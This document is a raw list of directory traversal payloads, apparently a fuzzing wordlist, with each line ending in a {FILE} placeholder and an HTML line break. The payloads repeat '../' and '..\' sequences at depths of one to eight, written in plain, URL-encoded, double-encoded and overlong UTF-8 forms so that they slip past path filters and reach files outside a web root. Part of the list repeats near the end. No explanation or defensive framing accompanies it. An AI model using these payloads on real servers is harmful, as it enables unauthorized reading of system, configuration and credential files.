../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
..%%32%66{FILE}<br />
..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
..%%35%63{FILE}<br />
..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
